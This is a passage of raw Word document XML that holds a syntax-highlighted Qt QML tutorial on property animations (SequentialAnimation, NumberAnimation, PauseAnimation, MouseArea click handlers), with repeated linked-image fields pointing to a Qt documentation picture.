          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>examples</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of different ways to do this:</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</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width</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320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height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Rectangle</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"blue"</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width</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height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By setting this SequentialAnimation on x, it and animations within it will automatically animate</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the x property of this element</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72F99" w:rsidRPr="00C21832" w:rsidRDefault="00D72F99" w:rsidP="00D72F99">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SequentialAnimation</w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on x </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>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id</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xAnim</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Animations on properties start running by default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running</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</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loops</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Animation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Infinite</w:t>
      </w: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The animation is set to loop indefinitely</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NumberAnimation</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from</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0</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to</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200</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duration</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500</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easing</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type</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Easing</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>InOutQuad</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NumberAnimation</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from</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200</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to</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0</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duration</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500</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easing</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type</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Easing</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>InOutQuad</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PauseAnimation</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duration</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250</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This puts a bit of time between the loop</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MouseArea</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anchors</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fill</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parent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The animation starts running when you click within the rectangle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72F99" w:rsidRPr="00C21832" w:rsidRDefault="00D72F99" w:rsidP="00D72F99">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>onClicked</w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> xAnim</w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">running </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</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width</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320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height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Rectangle</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id</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rectangle</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"yellow"</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width</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height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120</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MouseArea</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anchors</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fill</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parent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The animation starts running when you click within the rectange</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onClicked</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anim</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running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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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This animation specifically targets the Rectangle's properties to animate</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SequentialAnimation</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id</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anim</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Animations on their own are not running by default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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// The default number of loops is one, restart the animation to see it again</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NumberAnimation</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target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rectangle</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"x"</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from</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0</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to</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200</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duration</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500</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D72F99">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NumberAnimation</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target</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rectangle</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"x"</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from</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200</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to</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0</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duration</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>500</w:t>
      </w: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lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72F99" w:rsidRPr="00D72F99" w:rsidRDefault="00D72F99" w:rsidP="00D72F99">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72F99" w:rsidRPr="00D72F99" w:rsidRDefault="00D72F99" w:rsidP="00D72F99">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D72F99" w:rsidRDefault="00D72F99" w:rsidP="00D72F99">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/qml-uses-animation.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D72F99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-animation.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="002B6E64">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-animation.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00CF4C26">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-animation.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00821B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-animation.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0061520D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-animation.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00211A68">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-animation.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-uses-animation.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r 